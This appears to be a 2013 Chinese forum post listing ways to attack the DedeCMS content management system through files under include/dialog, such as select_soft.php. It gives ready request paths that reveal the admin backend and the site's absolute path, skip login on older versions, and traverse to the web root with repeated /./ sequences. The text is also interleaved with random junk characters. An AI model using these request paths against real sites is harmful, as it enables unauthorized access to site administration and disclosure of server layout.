1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
9 a6 H; j( Y8 @7 G. S* F
2 y- O+ [* o: e& N/ k, P: b5 X员帐号,新版本的就直接转向了后台.% ]$ v" X& T( a0 P h: F
" O! O2 z2 ~. `2.include/dialog/config.php会爆出后台管理路径$ Y) {- n4 F2 q: U2 S
' E3 B7 X' n, y( e3 Y4 C: U3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
( k: \ `! o3 Z* s$ T, x# h# Q3 v( F* G: w* R/ u
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.( I/ d4 Z1 C3 W" w
. ~' t" _- ~8 h7 o8 {
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉: X. U4 s# t/ t8 G% U+ v) r
; Y. G) B9 ^4 r/ F, D. b到根目录去.不过这些版本的访问地址有些不同.
1 x2 c" O& j6 T8 M9 S* E, m4 J地址为require/dialog/select_soft.php?activepath=/././././././././0 n$ N& b, t, O6 U9 R- u2 x" v
4 ^+ f* g3 D; i ]( \/ {include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..( l* H% f J. p, c4 _4 f6 |
存在相同问题的文件还有
1 E. M# j3 K; @+ h6 J* d8 qinclude\dialog\select_images.php1 h1 x" o) @7 }1 ^; e
include\dialog\select_media.php3 N- f Z; t% v0 B
include\dialog\select_templets.php$ T: Y( I. M/ [5 p" W
|
发表于 2013-4-16 16:50:43
收藏
支持
反对